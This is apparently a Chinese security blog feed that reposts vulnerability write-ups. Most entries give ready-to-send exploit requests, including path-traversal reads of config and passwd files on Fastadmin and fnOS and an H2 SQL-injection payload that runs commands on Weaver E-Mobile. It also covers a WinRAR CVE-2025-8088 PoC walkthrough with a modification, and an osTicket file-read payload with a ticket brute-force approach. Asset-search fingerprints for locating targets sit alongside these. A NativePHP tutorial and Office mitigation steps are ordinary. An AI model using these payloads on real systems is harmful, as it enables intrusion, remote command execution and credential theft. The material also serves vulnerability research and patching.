日常随记

Fastadmin框架任意文件读取漏洞附POC

Thu, 12 Feb 2026 22:29:42 +0800

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

—

漏洞名称

Fastadmin框架任意文件读取漏洞

—

影响版本

—

漏洞简介

FastAdmin后台框架开源且可以免费商用，一键生成 CRUD,FastAdmin是一款基于ThinkPHP 和 Bootstrap 的极速后台开发框架，基于Auth验证的权限管理系统,一键生成 CRUD,自动生成控制器、模型、视图JS、语言包、菜单、回收站等。FastAdmin框架的lang接口存在任意文件读取漏洞，该漏洞允许未授权攻击者通过构造特定请求读取系统敏感文件，如数据库配置文件、系统配置文件等。

—

资产测绘

body="/assets/js/require.js"

—

漏洞复现

POC

GET /index/ajax/lang?lang=../../application/database HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: think_var=..%2F..%2Fapplication%2Fdatabase; PHPSESSID=m0lgoj6m4hovmtisu1868cc8h5Upgrade-Insecure-Requests: 1Priority: u=0, iPragma: no-cacheCache-Control: no-cache

—

修复建议

升级到安全版本

—

往期回顾

泛微E-Mobile 远程命令执行漏洞（RCE）附POC

Thu, 12 Feb 2026 20:05:18 +0800

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

—

漏洞名称

泛微E-Mobile 远程命令执行漏洞

—

影响版本

泛微E-Mobile移动管理平台多个版本，部分漏洞影响版本为2024.3前

版本，部分涉及E-Mobile 6.0等版本。

—

漏洞简介

泛微e-Mobile移动管理平台是上海泛微网络科技股份有限公司推出的一款移动办公平台，旨在帮助企业构建以员工为核心的移动统一办公平台。它将企业ERP、CRM、OA等各类系统应用融合在一个平台，覆盖组织管理、业务、财务等各方面，通过统一组织、统一消息、统一应用、统一搜索、统一报表等功能，实现信息聚合与高效协同。攻击者可利用漏洞绕过身份验证，执行任意系统命令，获取服务器控制权，可能导致数据泄露、系统被控、植入后门等严重后果。

—

资产测绘

"Weaver E-Mobile"

—

漏洞复现

POC

POST /client.do HTTP/1.1Host:  127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=abcrCRF1rJkt_4V8s_ikz; ecology_JSessionid=abcrCRF1rJkt_4V8s_ikz; testBanCookie=test; Systemlanguid=7Upgrade-Insecure-Requests: 1Priority: u=0, iPragma: no-cacheCache-Control: no-cacheContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryyBvZrAkWyCD8dThVContent-Length: 1131------WebKitFormBoundaryyBvZrAkWyCD8dThVContent-Disposition: form-data; name="method"getupload------WebKitFormBoundaryyBvZrAkWyCD8dThVContent-Disposition: form-data; name="uploadID"1';CREATE ALIAS if not exists abcd AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL abcd('whoami');--------WebKitFormBoundaryyBvZrAkWyCD8dThV--

—

修复建议

升级到安全版本

—

往期回顾

飞牛系统（fnOS）任意文件读取漏洞附POC

Thu, 12 Feb 2026 20:04:12 +0800

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

—

漏洞名称

飞牛系统（fnOS）任意文件读取漏洞

—

影响版本

受影响的版本为1.1.15以下

—

漏洞简介

飞牛系统（fnOS）是一款国产网络附加存储（NAS）操作系统。飞牛系统（fnOS）适合追求功能丰富、预算有限且对数据安全要求不高的用户，尤其适合闲置硬件改造和影视娱乐场景。攻击者通过构造恶意请求，利用路径遍历字符（如../）绕过系统路径限制，直接访问服务器文件系统中的任意文件。攻击者可尝试读取服务器上的/etc/passwd文件，若漏洞存在，服务器将返回文件内容。

—

资产测绘

icon_hash="470295793"

—

漏洞复现

POC

GET /app-center-static/serviceicon/myapp/{0}/?size=../../../../etc/passwd HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, i

—

修复建议

升级到最新版本。

—

往期回顾

5 分钟打造你的第一个 NativePHP 移动应用

Thu, 12 Feb 2026 20:00:52 +0800

介绍

你是一名 Laravel 开发者。你熟悉 Blade、Livewire，或许还会一点 Vue 或 React。但你从来没有碰过 Swift 或者 Kotlin。

好消息：你完全不需要学它们。

NativePHP for Mobile 让你可以用已有的技能，开发出真正的原生 iOS 和 Android 应用。接下来 5 分钟内，你就能在自己手机上运行一个应用。

最快路径：使用 Jump

忘掉下载 Xcode（40GB+）。忘掉配置 Android Studio。全部都不需要。

Jump 是一款免费应用，它可以让你瞬间在真机上测试 NativePHP 应用，无需编译。

步骤 1：在手机上安装 Jump

前往以下地址下载 Jump：
https://bifrost.nativephp.com/jump

步骤 2：创建一个 Laravel 项目



1
2

laravel new my-mobile-app
cd my-mobile-app

步骤 3：安装 NativePHP Mobile



1

composer require nativephp/mobile

步骤 4：启动 Jump 服务器



1

php artisan native:jump

终端会显示一个 二维码。

步骤 5：扫码启动

打开手机上的 Jump 应用，扫描终端中的二维码……

就结束了。

你刚刚用 PHP 写了一个能在手机上运行的原生应用，而且只花了 5 分钟。

刚才到底发生了什么？

内嵌了 PHP 运行时 —— 预编译的 PHP 运行在设备本地

直接运行 Laravel —— 你的应用运行在手机本地，而不是远程服务器

桥接到原生 API —— PHP 代码可以直接调用 iOS / Android 原生接口

无需 Web 服务器 —— 完全离线可用

这不是 WebView 包装。这是真正的 PHP 原生运行。

完整的打包发布流程

如果需要发布到 App Store 或 Google Play：



1
2
3

composer require nativephp/mobile
php artisan native:install
php artisan native:run

第一个原生功能演示：触觉反馈

我们用一个 Web 应用永远做不到的功能来证明这是真原生——触觉振动（Haptic Feedback）。

在 Livewire 中的写法（PHP）



1

<button wire:click="vibrate">感受一下</button>



1
2
3
4
5
6

use Native\Mobile\Facades\Device;
 
public function vibrate()
{
    Device::vibrate();
}

在 Vue / React / Inertia 中的写法（JavaScript）



1
2
3
4
5
6
7
8
9
10
11

<template>
    <button @click="vibrate">感受一下</button>
</template>
 
<script setup>
import { Device } from '@nativephp/mobile'
 
const vibrate = async () => {
    await Device.vibrate()
}
</script>

点击按钮。你感觉到了吗？ 那是手机真实的振动反馈。普通 Web 应用永远做不到这一点，但你现在已经做到了。

恭喜🎉，你现在是一名移动开发者了。

原文链接：https://nativephp.com/blog/your-first-nativephp-mobile-app-in-5-minutes）

CVE-2026-20841 Windows记事本 Markdown RCE

Thu, 12 Feb 2026 19:55:26 +0800

CVE-2026-20841

漏洞介绍

2026年2月12日，微软发布安全通告，确认Windows系统内置的记事本程序存在一个高危安全漏洞，编号为CVE-2026-20841。

漏洞原理

该漏洞在通用漏洞评分系统中的评分为8.8分（满分10分），核心危害是攻击者可通过恶意 Markdown文件诱导用户点击链接，实现远程代码执行并完全控制目标设备。

影响版本

 Windows Notepad 11.0.0*< 11.2510

修复建议

更新应用：前往MicrosoftStore，将Windows记事本升级至版本11.2510及以上。

谨慎操作：避免打开来源不明的Markdown文件，不点击文件中的未知链接。

复现POC

winrar CVE-2025-8088复现学习

Sat, 31 Jan 2026 13:02:44 +0800

CVE-2025-8088 (CVSS 8.4) 是一个新的高风险路径遍历漏洞 [CWE-35] 在 WinRAR 7.12 及以下版本和相关组件包括 UnRAR.dll 中存在漏洞。该漏洞允许未经授权的攻击者将恶意文件复制到敏感目录，包括 Windows 启动文件夹，从而可以执行这些文件。

这又是一个关于winrar漏洞的CVE，我记得在前面7月份复现学习了一个《CVE-2025-6218 Poc复现及1Day研究》，也是winrar的，针对的版本是7.11，而这个8088针对的是7.12。半年时间连续发现2个遍历漏洞，winrar也是备受黑客的青睐。

一、检测winrar版本

先上一段ps1的代码，

# Detects exposure to CVE-2025-8088 based on WinRAR.

# Vulnerable: WinRAR < 7.13 (Patched: 7.13+)

Set-StrictMode -Version Latest

$ErrorActionPreference = 'Stop'

function info { param([string]$m) Write-Host "[i] $m" }

function good { param([string]$m) Write-Host "[+] $m" -ForegroundColor Green }

function bad { param([string]$m) Write-Host "[-] $m" -ForegroundColor Red }

$fixedVersion = [version]'7.13.0'

# Common install locations

$candidates = @(

"$env:ProgramFiles\WinRAR\WinRAR.exe",

"${env:ProgramFiles(x86)}\WinRAR\WinRAR.exe"

) | Where-Object { $_ -and (Test-Path $_) }

if (-not $candidates) {

$cmd = Get-Command 'WinRAR.exe' -ErrorAction SilentlyContinue

if ($cmd) { $candidates = @($cmd.Source) }

}

if (-not $candidates) {

info "WinRAR not found. Nothing to check."

return

}

$entries = foreach ($p in $candidates) {

$v = (Get-Command $p).FileVersionInfo.ProductVersion

[pscustomobject]@{ Path = $p; Version = $v; V = [version]$v }

}

$winrar = $entries | Sort-Object V -Descending | Select-Object -First 1

info ("WinRAR path: " + $winrar.Path)

info ("WinRAR version: " + $winrar.Version)

if ($winrar.V -lt $fixedVersion) {

bad "CVE-2025-8088 IS exploitable (WinRAR < 7.13)."

} else {

good "CVE-2025-8088 is NOT exploitable (WinRAR >= 7.13)."

}

检测结果如图：

说明我们的版本是7.12，以及winrar所在的路径位置；或者查看winrar版本，

二、复现过程

1、Exploit video:

2、PoC-Exploit：

3、poc下载

https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-?tab=readme-ov-file

4、举例

（1）构建命令，python poc.py --decoy clib.txt --payload run_decode.bat --drop "C:\Users\Administrator\Desktop\CVE-2025-8088-WinRAR-PoC-Exploit" --rar "C:\Program Files\WinRAR\rar.exe"

（2）参数含义：

该命令的实际效果

此命令将创建一个恶意RAR文件，其攻击流程如下：

读取文件：

诱饵：clib.txt（需存在于当前目录）
载荷：run_decode.bat（需存在于当前目录）

NTFS流附加：

将run_decode.bat作为交替数据流(ADS)附加到clib.txt上
流名称初始化为128字节的占位符（如XXXXXXXX...）

生成基础RAR：

调用WinRAR生成包含clib.txt及其ADS流的普通RAR5文件

二进制补丁：

在RAR头部搜索占位符字符串
替换为路径遍历字符串：..\..\..\...（16层）\Desktop\CVE-2025-8088...\run_decode.bat

CRC32修复：

重新计算所有RAR块头的CRC32校验和，确保文件格式合法

输出文件：

默认生成：cve-2025-8088-sxy-poc.rar
中间文件：cve-2025-8088-sxy-poc.base.rar（生成后自动删除）

攻击后果

当受害者使用存在漏洞的WinRAR版本解压时：

表面上看：只解压出clib.txt
实际上：run_decode.bat会被释放到：
C:\Users\Administrator\Desktop\CVE-2025-8088-WinRAR-PoC-Exploit\run_decode.bat

（3）生成攻击rar

通过7z l -sns来检查生成的rar，

这里的载荷文件是run_decode.bat；

或者 NtfsStreamEditor 来查看，

直接出来了ADS中包含的启动载荷run_decode.bat的内容。

（4）互联网中公布的利用

我们再来看一个更为明显的载荷，hta启动

顺便借用个攻击链过程图，

可以看到通过“恶意邮件：附件-->CVE-2025-8088-->释放恶意HTA载荷文件-->连接下载服务器-->下载后续载荷文件-->连接C2服务器”。

5、winrar解压缩的表现特征

这里借用网上的恶意文件。用winrar解压，

这时，报错。将这段内容复制出来，粘贴到文本中，再看下，

完整的就是不一样了，出现了“Bang_Luong_Thang_11_2025.csv:..\..\..\..\..\..\..\..\Users\sosona\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe”

6、改造poc.py

以下是修改 poc.py 的代码建议，它会在生成 RAR 文件后，为其附加一个模拟的 Zone.Identifier ADS 流。

修改说明：

（1）. 新增 attach_motw 函数，用于创建 Zone.Identifier 流。

（2）. 在 main 函数最后调用该函数，为输出的 RAR 文件添加 ADS。

defattach_motw(path: Path):

"""Attach Zone.Identifier to mimic a downloaded file (ZoneId=3)."""

motw = textwrap.dedent("""\

[ZoneTransfer]

ZoneId=3

HostUrl=about:internet

""")

try:

withopen(f"{path}:Zone.Identifier", "w") as f:

f.write(motw)

print(f"[+] Attached Zone.Identifier (Mark of the Web) to {path}")

exceptExceptionas e:

print(f"[-] Failed to attach MOTW: {e}")

应用上述修改后，再次运行 PoC 脚本生成的 RAR 文件将会在文件系统层面拥有一个 Zone.Identifier ADS 流，这有助于模拟真实的攻击场景（即通过网络下载的恶意文件）。

如果想验证修改后的效果，可以在运行脚本后使用 PowerShell 命令 Get-Item -Path cve-2025-8088-sxy-poc.rar -Stream * 查看是否成功添加了 ADS 流。

三、总结

1、CVE-2025-8088针对是7.13以下版本的winrar，危害性很大，各位网友赶快升级到最新版本7.13；

2、通过上面的“检测与复现”，了解该漏洞的构造、传播过程以及ADS 将恶意二进制文件隐藏起来，使其无法被随意检查和一些传统的安全工具发现，从而延迟了检测。同时，我们分享了两种检测ADS流的方法，并改造poc.py使其更加具备生成的文件Zone.Identifier ADS 流；

3、我们本文为漏洞复现，内容非常详细，网上还未看到相关文章，复现分析是为了更好地防范攻击，一定不要用于危害活动，否则跟本人无关。

紧急！微软Office零日漏洞CVE-2026-21509已被黑客利用，365/2021用户重启即可，2016/2019需手动改注册表

Sat, 31 Jan 2026 13:01:39 +0800

Office用户注意！微软刚紧急通报一个正被黑客在野利用的零日漏洞——CVE-2026-21509，CVSS评分7.8（重要级），影响Office 2016/2019/2021/LTSC 2024及Microsoft 365 Apps。攻击者只需诱骗你打开恶意Word/Excel文档，就能绕过Office安全机制，窃取文件、植入恶意软件甚至控制你的电脑。

更棘手的是，Office 2016/2019的正式补丁尚未发布，用户需手动改注册表临时防护；而365 Apps与2021/2024 LTSC用户重启Office即可自动生效服务器端修复。

详细信息：https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509

漏洞核心：绕过OLE防护，黑客可自由执行恶意代码

这个漏洞本质是安全功能绕过漏洞，专门突破Office的OLE（对象链接与嵌入）安全机制。正常情况下，Office会拦截文档中隐藏的危险COM/OLE控件，防止恶意代码执行；但该漏洞让Office“忽略自身安全规则”，信任攻击者构造的恶意输入，直接放行危险控件。

攻击流程（3步即可中招）

攻击者制作包含恶意COM/OLE控件的Word/Excel文档；
通过钓鱼邮件、即时通讯等方式，诱骗用户打开文档（预览模式不会触发，必须双击打开）；
文档启动后，恶意控件绕过防护执行代码，窃取数据、安装木马或篡改文件。

影响范围（覆盖主流Office版本）

版本	修复状态	防护方式
Microsoft 365 Apps	已修复（服务器端）	重启Office即可
Office LTSC 2021/2024	已修复（服务器端）	重启Office即可
Office 2019	未修复，补丁待发布	手动改注册表临时防护
Office 2016	未修复，补丁待发布	手动改注册表临时防护

分级防护：不同版本的紧急修复方案

方案1：365 Apps/LTSC 2021/2024用户（最简单）

关闭所有Office应用（Word/Excel/PowerPoint等）；
重新启动Office程序，服务器端修复自动生效，无需额外操作。

方案2：2016/2019用户（需手动改注册表，高危操作）

修改注册表前必须备份（建议用系统自带注册表备份工具，详见微软官方指南），避免误操作导致系统故障。

详细步骤

退出所有Office程序，按Win键+R，输入regedit打开注册表编辑器；

定位对应注册表路径（根据Office安装类型选择）：

安装类型	路径
64位MSI/32位Windows上的32位MSI	`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Common\COM Compatibility\`
64位Windows上的32位MSI	`HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\COM Compatibility\`
64位Click2Run/32位Windows上的32位Click2Run	`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office\16.0\Common\COM Compatibility\`
64位Windows上的32位Click2Run	`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Office\16.0\Common\COM Compatibility\`
若没有`COM Compatibility`项，右键`Common`→新建→项，命名为`COM Compatibility`；

右键COM Compatibility→新建→项，命名为{EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}；
右键新项→新建→DWORD（32位）值，命名为Compatibility Flags，值设为400（十六进制）；
关闭注册表编辑器，重启Office应用，临时防护生效。

额外防护：降低攻击风险的3个好习惯

拒绝陌生文档：不打开来源不明的Word/Excel附件，尤其是“发票”“合同”等钓鱼文档；
启用宏阻止：Office默认禁用宏，不要为陌生文档启用宏；
定期备份数据：重要文件存到本地+云盘双备份，防止数据被篡改或加密。

建议2016/2019用户尽快按指南修改注册表，同时关注微软官方公告，待正式补丁发布后立即安装；365与2021/2024用户也需重启Office，确保修复生效。

CVE-2026-22200：osTicket工单直通系统Shell的漏洞剖析

Sat, 31 Jan 2026 12:58:35 +0800

Horizon3.ai的研究团队在流行的开源服务台系统osTicket中发现了一个受CTF启发、编号为CVE-2026-22200的安全漏洞。该漏洞允许匿名攻击者通过向工单中注入恶意的PHP过滤器链表达式，然后将工单导出为PDF文档，从而读取服务器上的任意文件。攻击者可以利用该漏洞窃取敏感文件（这些文件会以位图图像形式嵌入PDF中）；若结合利用CVE-2024-2961（亦称CNEXT），甚至可实现远程代码执行。该问题已在osTicket 1.18.3 / 1.17.7版本中修复，研究团队强烈建议所有用户升级至最新版本。

背景

osTicket界面

osTicket是一款广受欢迎的开源服务台系统，常被寻求轻量级、自托管支持解决方案的组织采用。Horizon3.ai的研究人员经常在SLED（州、地方及教育）部门以及其他中端市场至中小型企业环境中发现其部署。由于其数千个实例暴露在互联网上，且更多实例部署于内网，该系统的攻击面相当可观。

工单系统通常是攻击者的高价值目标，它们通常包含令牌或凭据等敏感信息，并可能成为攻击者横向移动进入内部网络的跳板。近期在野被利用的工单系统漏洞包括影响SolarWinds Web Help Desk的CVE-2024-28986/CVE-2024-28987和影响SysAid的CVE-2025-2775/CVE-2025-2776。

从架构上看，osTicket是一个老派的PHP应用程序，最初于2003年发布，已接受过包括SonarSource、Checkmarx在内的多方深入研究。尽管如此，研究人员在梳理代码库时，发现该应用对老旧第三方库的依赖值得进一步探索。结合PHP过滤器链利用技术的最新进展，他们决定从新的视角审视其安全性。

漏洞详解

从汇点入手：mPDF库

研究团队首先分析了mPDF，这是osTicket用于将支持工单生成为PDF文档的第三方PHP库。任何被授权查看工单的用户均可使用此功能，若服务台配置为允许访客访问工单（此为默认设置），则未认证的访客亦可使用。

PDF库因其需要衔接HTML/CSS与PDF这两种复杂格式而著称。将这些库集成到应用中时，一个常见的故障点是对外部资源（如图片、样式表）的处理。在将URL或本地文件路径传递给PDF生成器之前，调用应用需对其进行何种程度的净化往往不明确；且生成器本身也可能存在缺陷，这可能导致服务器端请求伪造或本地文件读取漏洞。

在研究mPDF时，研究人员偶然发现了一个来自HITCON CTF 2022、由@_splitline_提出的相关且有趣的CTF挑战web2pdf。该挑战探讨了如何利用mPDF读取任意本地文件，所用的HTML片段非常简单：

<img src="<malicious_url>" />

解决该挑战的技巧主要有两点：

路径规范化绕过： mPDF试图将phar://和php://等危险的URI方案列入黑名单。然而，该库的路径处理中存在一个错误，允许攻击者使用php:\\或./php://等变体路径绕过此检查。问题在于，mPDF是在规范化之前依据流包装器黑名单检查URL的。此Bug在mPDF的最新版本中依然存在。
PHP过滤器魔法：为了绕过mPDF的图像验证，攻击者需使用PHP过滤器链在任意文件内容前添加一个有效的位图（BMP）文件头。这使得mPDF误将任意文件（如/etc/passwd）作为有效图像渲染到PDF中。随后，敏感数据可以从PDF中的位图提取出来。

BMP技巧尤为实用，因为它允许攻击者单次高效地窃取文件内容，而无需采用速度较慢的基于错误的预言机方法。

第一个障碍：不同版本的mPDF

在尝试将CTF解决方案应用于osTicket时，研究团队遇到的第一个障碍是，osTicket使用的是2019年前后的一个非常旧的mPDF版本。web2pdf挑战中使用的规范化绕过方法，在该版本中并不存在。

然而，他们发现了另一种涉及URL编码的绕过方法。像php%3a//这样的URL编码流包装器可以绕过流包装器黑名单检查。这是因为旧版mPDF中的逻辑是：先依据流包装器黑名单检查本地资源，之后才对其进行URL解码，然后才进行访问。

mPDF旧版本中URL解码逻辑的位置

解码后的资源随后通过file_get_contents函数访问：

使用file_get_contents访问解码后的资源

第二个障碍：HTML净化

即使有了针对mPDF的绕过方法，攻击载荷仍需穿过osTicket的输入验证层。工单中的所有富文本HTML内容都会被清理，并交由htmLawed第三方库处理，该库通过中和可疑标签和属性来净化输入。

htmLawed采用基于白名单的方法严格检查URI方案，并且足够智能，能够识别像%3a这样的URL编码冒号。因此，类似下面的输入URI：

<img src="php%3a//myurl" />

会被添加denied:前缀进行中和：

htmLawed对URL编码的URI进行中和

其他图像属性如srcset也遇到同样问题。style属性中的所有URI也会被完全阻止。例如，像这样的style属性：

<ul>  <li style="list-style-image:url(http://myurl.com)">listitem</li></ul>

同样会被添加denied:前缀中和：

htmLawed阻止style属性中的URI

绕过HTML净化

在测试style属性时，研究团队注意到htmLawed中存在一个微妙的解析差异。如果在url关键字和开括号之间包含空格，URI就能逃脱净化器的白名单检查。

例如，以下载荷就完全通过了htmLawed的净化：<ul><li style="list-style-image:url (http://myurl.com)">listitem</li></ul>

带空格的URL绕过htmLawed检查

然而，这并非意味着成功。mPDF遵循严格的CSS标准，期望的是url()格式，中间没有多余的空格。如果保留空格，漏洞利用会在汇点（mPDF）失败；如果去掉空格，htmLawed又会阻止该URI。

但在此测试过程中，他们注意到输出会被奇怪地截断：

<ul>  <li style="list-style-image:url (http">listitem</li></ul>

他们发现，osTicket向htmLawed注册了一个自定义的净化后回调函数__html_cleanup，该函数对style属性执行了额外的字符串操作。

osTicket中危险的__html_cleanup回调函数代码

这段代码处理的是htmLawed已经清理过的输出，因此十分危险。它执行了多种转换，其中最重要的是HTML实体解码和字符剥离。研究团队面临的挑战是构思一个有效载荷，使其既能通过htmLawed，又能经受住__html_cleanup中对关键字符（引号、分号、冒号等）的处理，并最终被转换为mPDF可以接受的格式。他们最终构造出的载荷如下：

<ul><li style="list-style-image:url&#34(php%3a//myurl)">listitem</li></ul>

这个载荷使用了代表双引号"的HTML实体&#34来绕过htmLawed。该实体随后在__html_cleanup中被解码并剥离。值得注意的是，实体不需要结尾的分号。事实上，使用"反而会破坏__html_cleanup中的解析逻辑。

利用HTML实体构建的最终有效载荷

该有效载荷从输入到最终生效的完整流程如下：

恶意输入：url&#34(php%3a//myurl)
htmLawed输出（未改动）：url&#34(php%3a//myurl)
__html_cleanup中的实体解码：url"(php%3a//myurl)
__html_cleanup中的字符剥离：url(php%3a//myurl)
mPDF中的URL解码：url(php://myurl)

组合利用：利用PDF生成功能读取文件

在有了可工作的有效载荷后，该团队接下来展示了端到端的漏洞利用流程。他们假设的场景是：在Ubuntu上运行默认配置的osTicket 1.18.2版本，且电子邮件功能已配置。所有相关的利用脚本都托管在https://github.com/horizon3ai/CVE-2026-22200。

获取工单访问权限

要触发PDF导出功能，攻击者首先必须能够查看已提交的工单。在默认的osTicket配置下，匿名攻击者有两种路径：

自助注册：如果启用（默认），攻击者可注册账户、登录并创建工单。
暴力破解：如果自助注册被禁用，攻击者可以访客身份提交工单，然后通过“检查工单状态”表单暴力破解访问权限。

暴力破解路径借助了以下条件：

检查工单状态预言机： “检查工单状态”表单充当了一个预言机，当电子邮箱和工单号码组合有效时会予以确认。若有效，系统会将工单访问链接发送到用户的电子邮箱。
小的工单号码空间：默认情况下，工单号码空间为6位数字，从100000到999999。
绕过速率限制：每次请求前开启一个新会话，即可绕过针对每个用户的速率限制保护。这也规避了暴力破解尝试的日志记录。
创建多个工单：攻击者可创建多个工单（例如100个），由于工单号码在6位数字空间中随机分布，此举可极大加速暴力破解过程。

在团队的测试中，通过标准互联网连接进行暴力破解，通常可在不到一小时内轻松完成。

% python osticket_access_bruteforce.py http://osticket.example.com 'XXX@XXX.com' --threads 20======================================================================osTicket 工单访问链接枚举脚本======================================================================目标:        http://osticket.example.com/邮箱:         XXX@XXX.com工单范围:  100000 - 999999延迟:         0.5 秒线程数:       20[*] 扫描开始于: 2026-01-21 14:47:16[i] 进度: 100/900000 已测试, 0 个有效发现[i] 进度: 200/900000 已测试, 0 个有效发现[i] 进度: 300/900000 已测试, 0 个有效发现>>已截断<<[i] 进度: 27000/900000 已测试, 0 个有效发现[i] 进度: 27100/900000 已测试, 0 个有效发现[i] 进度: 27200/900000 已测试, 0 个有效发现[+] 有效: 工单 #127227 - 访问链接已发送（需要邮箱验证）[i] 进度: 27300/900000 已测试, 1 个有效发现[i] 进度: 27400/900000 已测试, 1 个有效发现[i] 进度: 27500/900000 已测试, 1 个有效发现>>已截断<<

某些非默认但较为常见的设置使获取工单访问权限变得更加容易：

自动回复器：若启用了“新工单：工单所有者”自动回复器，系统会立即向提交新工单的任何人发送工单访问链接的邮件。
用户界面自定义：若工单提交模板被修改为直接显示工单号码，则根本无需暴力破解。

将有效载荷注入工单

获取工单访问权限后，攻击者便可向工单中注入针对服务器上特定文件的有效载荷。在下例中，他们生成了一个用于窃取/etc/passwd和敏感文件include/ost-config.php的载荷。此恶意字符串被直接放置于工单的富文本HTML内容中。

将文件读取载荷注入工单

处理工单回复

如果攻击者想在工单已开放的情况下针对更多文件，可通过回复工单来注入更多载荷。然而，系统处理工单回复的方式与创建工单略有不同：它执行了两次HTML实体解码，而非一次。

为此，载荷必须被再次编码。这种情况下，载荷需要使用嵌套的实体序列&#3&#52来替代&#34，才能在双重解码过程中存活下来，并以正确格式到达mPDF汇点。其osticket_ticket_payload_gen脚本通过--reply标志来处理此问题。

从PDF中提取数据

一旦工单包含恶意HTML，攻击者导航至工单视图并选择“打印”为PDF。这会强制mPDF处理注入的list-style-image属性，解析PHP过滤器链，并渲染目标文件。

打印工单为PDF以触发漏洞利用

被窃取的数据以位图图像形式嵌入生成的PDF中。这些文件可通过从PDF的图像对象中剥离伪造的BMP文件头来提取。

从PDF中提取被窃取的数据

文件读取的特殊性

在测试过程中，研究团队发现了几个影响数据窃取可靠性的细微之处：

大写字母敏感性：他们观察到包含大写字母的文件路径有时会窃取失败。其osticket_ticket_payload_gen脚本通过URL编码载荷中的大写字母来解决此问题。
编码变化：标准过滤器链对文本文件有效，但二进制文件可能存在问题。他们发现，在BMP转换之前，将数据包装在Base64或zlib+Base64过滤器中，对二进制文件能产生稳定结果。其osticket_ticket_payload_gen脚本提供了这些编码选项。
大小限制：被窃取的图像通常截断在大约45KB处。这对于捕获配置文件和凭据来说绰绰有余，但可能会限制对二进制文件、数据库文件和大日志文件的窃取。

任意文件读取的影响

攻击者在osTicket中利用任意文件读取能做些什么？除了像/etc/passwd这样的标准系统文件外，主要目标是位于应用程序Web根目录下的配置文件include/ost-config.php。

# 加密/解密密钥 - 安装过程中随机生成。define('SECRET_SALT','SEFDaIg1UP=Rh0xHE=Ij6Lew8u49L=Tt');# 默认管理员邮箱。仅用于数据库连接问题及相关警报。define('ADMIN_EMAIL','XXX@XXX.com');# 数据库选项# ====================================================# Mysql 登录信息#define('DBTYPE','mysql');# DBHOST 可以包含逗号分隔的主机 (例如 db1:6033,db2:6033)define('DBHOST','localhost');define('DBNAME','osticket');define('DBUSER','osticket');define('DBPASS','XXXXXXXX');

该文件包含访问osTicket数据库的凭据，以及一个用于加密操作的SECRET_SALT值。如果数据库暴露在外，攻击者即可访问并转储所有工单数据。此外，数据库密码本身也是对其他组织账户进行凭据填充攻击的潜在目标。

SECRET_SALT是一个主密钥，用于加密/解密数据库中的敏感配置，如LDAP凭据、SMTP凭据和AWS访问密钥。需要注意的是，即使数据库未暴露，在osTicket 1.18.2之前的版本中，存在一个重大的SQL注入漏洞CVE-2025-26241，该漏洞能使任何经过身份验证的用户（包括自助注册用户）转储osTicket数据库的内容。当结合利用此CVE-2026-22200漏洞（可获取SECRET_SALT）时，攻击者便能完全读取数据库内容。

SECRET_SALT还用于生成访问令牌的链接。

在Windows安装环境中，影响可能更大；攻击者很可能能够访问已加入域的计算机上的远程SMB共享文件，并通过强制身份验证尝试，泄露运行osTicket的服务账户的NTLM哈希值。

伪造工单访问权限

SECRET_SALT值还允许攻击者绕过身份验证来获取工单访问权限。

